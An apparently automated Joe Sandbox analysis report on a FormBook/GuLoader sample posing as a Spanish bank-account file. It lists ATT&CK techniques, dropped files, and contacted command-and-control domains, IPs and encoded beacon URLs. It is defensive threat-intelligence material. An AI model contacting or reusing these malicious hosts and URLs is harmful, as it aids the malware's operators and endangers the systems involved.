Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Masquerading	1 OS Credential Dumping	2 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	411 Process Injection	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	411 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	1 Clipboard Data	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	4 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
cuenta iban-ES65.exe	8%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsn876E.tmp\nsExec.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://www.continentaloilandgas.com/v3ka/	0%	Avira URL Cloud	safe
http://www.b-r-consulting.ch/v3ka/	0%	Avira URL Cloud	safe
http://www.globalworld-travel.com/v3ka/?nf8dPP8p=FpC4ctUTedBaFzLPjh5PBN9Vwn38xnWsfuWaCxk5g1trlxnFx7v6dtr2+OePcWisPCE1uISKUROI1tM11v9REV8vlVyrWAjZBU/BkAgyH1KJ2P8kSR36Iuo=&L0=2tHtHNWXtBDdYR	0%	Avira URL Cloud	safe
http://www.clarycyber.com/v3ka/	0%	Avira URL Cloud	safe
http://crl.comodo	0%	Avira URL Cloud	safe
http://www.dreadbed.com/v3ka/	0%	Avira URL Cloud	safe
http://www.mvmusicfactory.org/v3ka/	100%	Avira URL Cloud	malware
http://www.xiefly.shop/v3ka/	0%	Avira URL Cloud	safe
http://www.mvmusicfactory.org/v3ka/?nf8dPP8p=svB+aVl3D/Qs3yYpy+EYx4/lcj1+jj1lh9v7sh/m91IvNeiskalMkbjGhLmhKb4ZrcP91hx+1jPTfxZ9U4bWGVnRMNWmuwE3Nqa36HepX9QRc4Df86SJn8w=&L0=2tHtHNWXtBDdYR	100%	Avira URL Cloud	malware
http://www.kmyangjia.com/v3ka/	0%	Avira URL Cloud	safe
http://www.teenpattimasterapp.org/v3ka/?nf8dPP8p=si7FLVHJ8iWuYVaJX0viNMh14aSy8OUSJ5em8DLLO2leI9d5bok8bcXzE4IwU2K08OGpdZcld0QPM+bL/KkbuGKMc/2hsM2YOWzLfJJOmXY/Qje/FgRXyNk=&L0=2tHtHNWXtBDdYR	0%	Avira URL Cloud	safe
http://www.wbyzm5.buzz/v3ka/	0%	Avira URL Cloud	safe
http://www.stellerechoes.xyz/v3ka/	0%	Avira URL Cloud	safe
http://www.kmyangjia.com/v3ka/?nf8dPP8p=TQDhdygg/6k1FrT4Y+Ji1OABi/Pr0Fm2MLjtTeKUejKDGRun2D/B3i3kqoFCSoO3Pw/E65XWfWwoO6YHx8j54r/FSG1v4bIQ+pjQtEt8fQcNNLpktl01Hso=&L0=2tHtHNWXtBDdYR	0%	Avira URL Cloud	safe
http://www.clarycyber.com/v3ka/?nf8dPP8p=J4AzjciiJVojUGFh27YaXL+RVgWMKJW/z8Zu4GWgm/9FzWPCzEiuTS1rwMX9pE5r2vC14B8Wx1zW9w/trsCTKSg2AEld6ylXwESzvhKrq7BgnePnhQ/Ly5c=&L0=2tHtHNWXtBDdYR	0%	Avira URL Cloud	safe
http://www.wbyzm5.buzz/v3ka/?nf8dPP8p=5DSEd0ATp85KgzdkASdwbLRc8+C6g6ShPg/Ik1pbcxCGQNrpEtjfCeVcF04T3qlunhYKINQJ6NoaGwxZUUZob6VNNlK6Td1e1fYChqY8Yb6J0jChxi/qqZI=&L0=2tHtHNWXtBDdYR	0%	Avira URL Cloud	safe
http://www.stellerechoes.xyz/v3ka/?nf8dPP8p=GFfLE978cTjgJhl1mwUYbE5kXfR5gz6iCpjaC2ljIm715WZCCh3yMSG+VpY2eWrvhd9eQ+mGyZHjkiS2WPxVQ0dW/wG4u7YMAwOv3lctYW3c8py2i2Lm0Nk=&L0=2tHtHNWXtBDdYR	0%	Avira URL Cloud	safe
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe
http://www.globalworld-travel.com/v3ka/	0%	Avira URL Cloud	safe
http://www.teenpattimasterapp.org/v3ka/	0%	Avira URL Cloud	safe
http://www.xiefly.shop/v3ka/?nf8dPP8p=dNjCJvlouN0lJiHsjG6p9lCI/WKfp2VThPe+fRU03jlQNeIZZXj0HZnF0wYmB7+6kDtWMlD6FZc6rz3hPOSCoZPNCiuZ/LMstJjl/N+g6ypukcRYLCDKiO8=&L0=2tHtHNWXtBDdYR	0%	Avira URL Cloud	safe
http://www.b-r-consulting.ch/v3ka/?nf8dPP8p=bbTJsjbns1egJ9JAh959MNYhMlBhishDkV02q5vokHm6S8Qgk9c4A4/rVALt8kpaWPL/RyZRbRAxNoIAik6Ahn7XchDP755TKRWw9+PVZyBlhOQ45aXm/eU=&L0=2tHtHNWXtBDdYR	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
xiefly.shop	82.180.172.14	true	true	unknown
www.stellerechoes.xyz	198.177.123.106	true	true	unknown
parkingpage.namecheap.com	91.195.240.19	true	false	high
drive.usercontent.google.com	142.250.188.225	true	false	high
www.t3c1srf.site	156.232.32.175	true	false	unknown
clarycyber.com	62.149.128.45	true	true	unknown
www.dreadbed.com	198.54.117.242	true	true	unknown
k2-ld.wakak1.shop	154.39.248.133	true	false	unknown
www.b-r-consulting.ch	194.191.24.38	true	true	unknown
cname.x172.zbwdj.com	103.146.179.172	true	true	unknown
drive.google.com	142.250.68.46	true	false	high
globalworld-travel.com	109.234.166.81	true	true	unknown
www.wbyzm5.buzz	172.67.130.3	true	true	unknown
teenpattimasterapp.org	84.32.84.32	true	true	unknown
www.xiefly.shop	unknown	unknown	true	unknown
www.artcitytheatre.com	unknown	unknown	true	unknown
www.kmyangjia.com	unknown	unknown	true	unknown
www.teenpattimasterapp.org	unknown	unknown	true	unknown
www.p65cq675did.shop	unknown	unknown	true	unknown
www.clarycyber.com	unknown	unknown	true	unknown
www.globalworld-travel.com	unknown	unknown	true	unknown
www.mvmusicfactory.org	unknown	unknown	true	unknown
www.midwestnationalflying.com	unknown	unknown	true	unknown
www.sengogkaffe.info	unknown	unknown	true	unknown
www.continentaloilandgas.com	unknown	unknown	true	unknown
www.mehr-neukunden.online	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.continentaloilandgas.com/v3ka/	true	Avira URL Cloud: safe	unknown
http://www.dreadbed.com/v3ka/	true	Avira URL Cloud: safe	unknown
http://www.xiefly.shop/v3ka/	true	Avira URL Cloud: safe	unknown
http://www.kmyangjia.com/v3ka/	true	Avira URL Cloud: safe	unknown
http://www.mvmusicfactory.org/v3ka/?nf8dPP8p=svB+aVl3D/Qs3yYpy+EYx4/lcj1+jj1lh9v7sh/m91IvNeiskalMkbjGhLmhKb4ZrcP91hx+1jPTfxZ9U4bWGVnRMNWmuwE3Nqa36HepX9QRc4Df86SJn8w=&L0=2tHtHNWXtBDdYR	true	Avira URL Cloud: malware	unknown
http://www.b-r-consulting.ch/v3ka/	true	Avira URL Cloud: safe	unknown
http://www.globalworld-travel.com/v3ka/?nf8dPP8p=FpC4ctUTedBaFzLPjh5PBN9Vwn38xnWsfuWaCxk5g1trlxnFx7v6dtr2+OePcWisPCE1uISKUROI1tM11v9REV8vlVyrWAjZBU/BkAgyH1KJ2P8kSR36Iuo=&L0=2tHtHNWXtBDdYR	true	Avira URL Cloud: safe	unknown
http://www.clarycyber.com/v3ka/	true	Avira URL Cloud: safe	unknown
http://www.mvmusicfactory.org/v3ka/	true	Avira URL Cloud: malware	unknown
http://www.clarycyber.com/v3ka/?nf8dPP8p=J4AzjciiJVojUGFh27YaXL+RVgWMKJW/z8Zu4GWgm/9FzWPCzEiuTS1rwMX9pE5r2vC14B8Wx1zW9w/trsCTKSg2AEld6ylXwESzvhKrq7BgnePnhQ/Ly5c=&L0=2tHtHNWXtBDdYR	true	Avira URL Cloud: safe	unknown
http://www.wbyzm5.buzz/v3ka/	true	Avira URL Cloud: safe	unknown
http://www.teenpattimasterapp.org/v3ka/?nf8dPP8p=si7FLVHJ8iWuYVaJX0viNMh14aSy8OUSJ5em8DLLO2leI9d5bok8bcXzE4IwU2K08OGpdZcld0QPM+bL/KkbuGKMc/2hsM2YOWzLfJJOmXY/Qje/FgRXyNk=&L0=2tHtHNWXtBDdYR	true	Avira URL Cloud: safe	unknown
http://www.kmyangjia.com/v3ka/?nf8dPP8p=TQDhdygg/6k1FrT4Y+Ji1OABi/Pr0Fm2MLjtTeKUejKDGRun2D/B3i3kqoFCSoO3Pw/E65XWfWwoO6YHx8j54r/FSG1v4bIQ+pjQtEt8fQcNNLpktl01Hso=&L0=2tHtHNWXtBDdYR	true	Avira URL Cloud: safe	unknown
http://www.globalworld-travel.com/v3ka/	true	Avira URL Cloud: safe	unknown
http://www.stellerechoes.xyz/v3ka/?nf8dPP8p=GFfLE978cTjgJhl1mwUYbE5kXfR5gz6iCpjaC2ljIm715WZCCh3yMSG+VpY2eWrvhd9eQ+mGyZHjkiS2WPxVQ0dW/wG4u7YMAwOv3lctYW3c8py2i2Lm0Nk=&L0=2tHtHNWXtBDdYR	true	Avira URL Cloud: safe	unknown
http://www.stellerechoes.xyz/v3ka/	true	Avira URL Cloud: safe	unknown
http://www.wbyzm5.buzz/v3ka/?nf8dPP8p=5DSEd0ATp85KgzdkASdwbLRc8+C6g6ShPg/Ik1pbcxCGQNrpEtjfCeVcF04T3qlunhYKINQJ6NoaGwxZUUZob6VNNlK6Td1e1fYChqY8Yb6J0jChxi/qqZI=&L0=2tHtHNWXtBDdYR	true	Avira URL Cloud: safe	unknown
http://www.teenpattimasterapp.org/v3ka/	true	Avira URL Cloud: safe	unknown
http://www.xiefly.shop/v3ka/?nf8dPP8p=dNjCJvlouN0lJiHsjG6p9lCI/WKfp2VThPe+fRU03jlQNeIZZXj0HZnF0wYmB7+6kDtWMlD6FZc6rz3hPOSCoZPNCiuZ/LMstJjl/N+g6ypukcRYLCDKiO8=&L0=2tHtHNWXtBDdYR	true	Avira URL Cloud: safe	unknown
http://www.b-r-consulting.ch/v3ka/?nf8dPP8p=bbTJsjbns1egJ9JAh959MNYhMlBhishDkV02q5vokHm6S8Qgk9c4A4/rVALt8kpaWPL/RyZRbRAxNoIAik6Ahn7XchDP755TKRWw9+PVZyBlhOQ45aXm/eU=&L0=2tHtHNWXtBDdYR	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://drive.usercontent.google.com/ae	cuenta iban-ES65.exe, 00000002.00000002.13283887278.0000000007450000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.comodo	cuenta iban-ES65.exe, 00000002.00000002.13283887278.0000000007450000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.usercontent.google.com/	cuenta iban-ES65.exe, 00000002.00000002.13283887278.0000000007450000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	cuenta iban-ES65.exe, 00000000.00000000.12574161471.0000000000409000.00000008.00000001.01000000.00000003.sdmp, cuenta iban-ES65.exe, 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmp	false		high
https://www.google.com	cuenta iban-ES65.exe, 00000002.00000003.13144570001.0000000007498000.00000004.00000020.00020000.00000000.sdmp, cuenta iban-ES65.exe, 00000002.00000003.13122562796.0000000007498000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	cuenta iban-ES65.exe, cuenta iban-ES65.exe, 00000000.00000000.12574161471.0000000000409000.00000008.00000001.01000000.00000003.sdmp, cuenta iban-ES65.exe, 00000000.00000002.13145500169.0000000000409000.00000004.00000001.01000000.00000003.sdmp	false		high
http://www.quovadis.bm0	cuenta iban-ES65.exe, 00000002.00000002.13283887278.0000000007450000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://apis.google.com	cuenta iban-ES65.exe, 00000002.00000003.13144570001.0000000007498000.00000004.00000020.00020000.00000000.sdmp, cuenta iban-ES65.exe, 00000002.00000003.13122562796.0000000007498000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ocsp.quovadisoffshore.com0	cuenta iban-ES65.exe, 00000002.00000002.13283887278.0000000007450000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.191.24.38	www.b-r-consulting.ch	Switzerland	1836	GREENgreenchAGAutonomousSystemEU	true
84.32.84.32	teenpattimasterapp.org	Lithuania	33922	NTT-LT-ASLT	true
103.146.179.172	cname.x172.zbwdj.com	unknown	136950	HIITL-AS-APHongKongFireLineNetworkLTDHK	true
156.232.32.175	www.t3c1srf.site	Seychelles	8100	ASN-QUADRANET-GLOBALUS	false
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	false
142.250.68.46	drive.google.com	United States	15169	GOOGLEUS	false
172.67.130.3	www.wbyzm5.buzz	United States	13335	CLOUDFLARENETUS	true
82.180.172.14	xiefly.shop	Denmark	29100	BROADCOMDK	true
198.177.123.106	www.stellerechoes.xyz	United States	395681	FINALFRONTIERVG	true
109.234.166.81	globalworld-travel.com	France	50474	O2SWITCHFR	true
198.54.117.242	www.dreadbed.com	United States	22612	NAMECHEAP-NETUS	true
154.39.248.133	k2-ld.wakak1.shop	United States	174	COGENT-174US	false
154.55.135.138	unknown	United States	174	COGENT-174US	false
142.250.188.225	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
62.149.128.45	clarycyber.com	Italy	31034	ARUBA-ASNIT	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1400264
Start date and time:	2024-02-28 15:40:40 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 17m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	cuenta iban-ES65.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/10@26/15
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 97% Number of executed functions: 47 Number of non-executed functions: 331
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe
Execution Graph export aborted for target XHYtgzYIOwxqJ.exe, PID 1784 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: cuenta iban-ES65.exe

Simulations

Behavior and APIs

Time	Type	Description
15:44:29	API Interceptor	31608596x Sleep call for process: rasautou.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
194.191.24.38	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.b-r-consulting.ch/v3ka/
	Factura seg#U00fan contrato firmado.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.b-r-consulting.ch/v3ka/
	pedido-003198.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.b-r-consulting.ch/v3ka/
	pedido-03198.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.b-r-consulting.ch/v3ka/
	rN__089734.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.b-r-consulting.ch/v3ka/
	Derivativets.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.b-r-consulting.ch/hjen/
84.32.84.32	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.teenpattimasterapp.org/v3ka/
	Factura seg#U00fan contrato firmado.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.teenpattimasterapp.org/v3ka/
	pedido-003198.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.teenpattimasterapp.org/v3ka/
	DHL Shipping DOC_69793741770.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.meliorras.com/nk2s/
	rethnical.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.teenpattimasterapp.org/m9so/
	DHL shipping DOC_6979374150.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.meliorras.com/nk2s/
	pedido-03198.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.teenpattimasterapp.org/v3ka/
	purchase list.exe	Get hash	malicious	FormBook	Browse	www.luluati.com/0m8b/
	DHL Express_5047270226.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.xn--bb55rtp-9va2p.store/3a3w/
	DHL Receipt_2048094227.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.meliorras.com/nk2s/
103.146.179.172	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.kmyangjia.com/v3ka/
	Factura seg#U00fan contrato firmado.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.kmyangjia.com/v3ka/
	pedido-003198.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.kmyangjia.com/v3ka/
	pedido-03198.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.kmyangjia.com/v3ka/
	rN__089734.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.kmyangjia.com/v3ka/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
parkingpage.namecheap.com	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	prkwSBzhFfzzGLW.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	j8Fb3w54RU.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	CHAbsVmE24.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	nMjEmb4aik.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	Factura seg#U00fan contrato firmado.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	Receipt.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	pedido-003198.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	DHL Shipping DOC_69793741770.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	rethnical.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
www.dreadbed.com	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.242
	Factura seg#U00fan contrato firmado.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.242
	pedido-003198.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.242
	pedido-03198.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.242
	rN__089734.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.54.117.242
www.t3c1srf.site	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse	156.232.32.175
	Factura seg#U00fan contrato firmado.exe	Get hash	malicious	FormBook, GuLoader	Browse	156.232.32.175
	pedido-003198.exe	Get hash	malicious	FormBook, GuLoader	Browse	156.232.32.175
	rethnical.exe	Get hash	malicious	FormBook, GuLoader	Browse	156.232.32.175
	pedido-03198.exe	Get hash	malicious	FormBook, GuLoader	Browse	156.232.32.175
	rN__089734.exe	Get hash	malicious	FormBook, GuLoader	Browse	156.232.32.175
	Modiolus.exe	Get hash	malicious	FormBook, GuLoader	Browse	156.232.32.175
www.stellerechoes.xyz	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.177.123.106
	Factura seg#U00fan contrato firmado.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.177.123.106
	pedido-003198.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.177.123.106
	pedido-03198.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.177.123.106
	rN__089734.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.177.123.106

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASN-QUADRANET-GLOBALUS	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse	156.232.32.175
	Consignment Notification-#U00a0 6183111.xz.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	64.188.2.244
	http://newssocialwork.com/public/MW.zip	Get hash	malicious	Unknown	Browse	66.63.168.90
	DHLAWB907853880911.jar	Get hash	malicious	ADWIND	Browse	155.94.211.9
	https://conarts.com.au/firstam.html	Get hash	malicious	HTMLPhisher	Browse	104.247.160.136
	https://conarts.com.au/firstam.html	Get hash	malicious	HTMLPhisher	Browse	104.247.160.136
	New Order 986589000.gx.exe	Get hash	malicious	AgentTesla	Browse	64.188.2.244
	2MfOp4FY7r.elf	Get hash	malicious	Mirai	Browse	69.12.93.132
	INVOICE-09865600.cmd.exe	Get hash	malicious	AgentTesla	Browse	64.188.2.244
	Amended Order #60-23095847001XXX024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	64.188.2.244
GREENgreenchAGAutonomousSystemEU	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse	194.191.24.38
	rDaOraovjl.elf	Get hash	malicious	Unknown	Browse	81.221.203.31
	Factura seg#U00fan contrato firmado.exe	Get hash	malicious	FormBook, GuLoader	Browse	194.191.24.38
	pedido-003198.exe	Get hash	malicious	FormBook, GuLoader	Browse	194.191.24.38
	e9IHj8wbl7.elf	Get hash	malicious	Mirai	Browse	193.193.150.8
	bLjDNQ7nb4.elf	Get hash	malicious	Mirai	Browse	81.221.227.34
	VBCkJNitS4.elf	Get hash	malicious	Mirai, Okiru	Browse	193.72.159.106
	pedido-03198.exe	Get hash	malicious	FormBook, GuLoader	Browse	194.191.24.38
	rN__089734.exe	Get hash	malicious	FormBook, GuLoader	Browse	194.191.24.38
	8SR7U72qXD.elf	Get hash	malicious	Unknown	Browse	193.193.150.5
NTT-LT-ASLT	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse	84.32.84.32
	nMjEmb4aik.exe	Get hash	malicious	FormBook	Browse	84.32.84.148
	Factura seg#U00fan contrato firmado.exe	Get hash	malicious	FormBook, GuLoader	Browse	84.32.84.32
	pedido-003198.exe	Get hash	malicious	FormBook, GuLoader	Browse	84.32.84.32
	http://www.mfpdownload.com/	Get hash	malicious	Unknown	Browse	84.32.84.31
	DHL Shipping DOC_69793741770.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	84.32.84.32
	rethnical.exe	Get hash	malicious	FormBook, GuLoader	Browse	84.32.84.32
	DHL shipping DOC_6979374150.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	84.32.84.32
	pedido-03198.exe	Get hash	malicious	FormBook, GuLoader	Browse	84.32.84.32
	purchase list.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
SEDO-ASDE	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	prkwSBzhFfzzGLW.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	PLI2qlm3to.exe	Get hash	malicious	FormBook	Browse	91.195.240.117
	j8Fb3w54RU.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	nMjEmb4aik.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	uzsAv38aCg.exe	Get hash	malicious	FormBook	Browse	91.195.240.12
	Factura seg#U00fan contrato firmado.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	Receipt.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	pedido-003198.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	DHL Shipping DOC_69793741770.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
HIITL-AS-APHongKongFireLineNetworkLTDHK	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.146.179.172
	Factura seg#U00fan contrato firmado.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.146.179.172
	pedido-003198.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.146.179.172
	pedido-03198.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.146.179.172
	rN__089734.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.146.179.172
	kDsB7OEKi8.exe	Get hash	malicious	Unknown	Browse	45.195.204.94
	kDsB7OEKi8.exe	Get hash	malicious	Unknown	Browse	45.195.204.94
	mLf8TFyZ7u.exe	Get hash	malicious	FormBook, NSISDropper	Browse	103.146.179.167
	sd4hiKirgx.exe	Get hash	malicious	Unknown	Browse	45.195.204.119
	Eod6mJw1Qy.exe	Get hash	malicious	FormBook	Browse	103.146.179.136

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	nPO-519192411.vbs	Get hash	malicious	FormBook, GuLoader	Browse	142.250.188.225 142.250.68.46
	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.188.225 142.250.68.46
	6lqTpM1UQn.exe	Get hash	malicious	Vidar	Browse	142.250.188.225 142.250.68.46
	Setup.exe	Get hash	malicious	LummaC, PureLog Stealer, Xmrig, zgRAT	Browse	142.250.188.225 142.250.68.46
	rResegregation.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.188.225 142.250.68.46
	SecuriteInfo.com.Program.Unwanted.5399.28168.2681.exe	Get hash	malicious	Unknown	Browse	142.250.188.225 142.250.68.46
	SecuriteInfo.com.Program.Unwanted.5399.28168.2681.exe	Get hash	malicious	Unknown	Browse	142.250.188.225 142.250.68.46
	SecuriteInfo.com.FileRepMalware.29389.28556.exe	Get hash	malicious	Unknown	Browse	142.250.188.225 142.250.68.46
	SecuriteInfo.com.FileRepMalware.29389.28556.exe	Get hash	malicious	Unknown	Browse	142.250.188.225 142.250.68.46
	Booking Information ##208.exe	Get hash	malicious	GuLoader, Remcos	Browse	142.250.188.225 142.250.68.46

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsn876E.tmp\nsExec.dll	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse
	cuenta iban-ES65.exe	Get hash	malicious	GuLoader	Browse
	rResegregation.exe	Get hash	malicious	FormBook, GuLoader	Browse
	rResegregation.exe	Get hash	malicious	GuLoader	Browse
	INNORIX-Agent.exe	Get hash	malicious	Unknown	Browse
	INNORIX-Agent.exe	Get hash	malicious	Unknown	Browse
	HICAPSConnect_4.0.0.1.exe	Get hash	malicious	Unknown	Browse
	bPYR660y5o.exe	Get hash	malicious	Azorult, GuLoader	Browse
	uQP25xP5DH.exe	Get hash	malicious	GuLoader	Browse
C:\Users\user\AppData\Local\Temp\nsn876E.tmp\System.dll	cuenta iban-ES65.exe	Get hash	malicious	FormBook, GuLoader	Browse
	cuenta iban-ES65.exe	Get hash	malicious	GuLoader	Browse
	rResegregation.exe	Get hash	malicious	FormBook, GuLoader	Browse
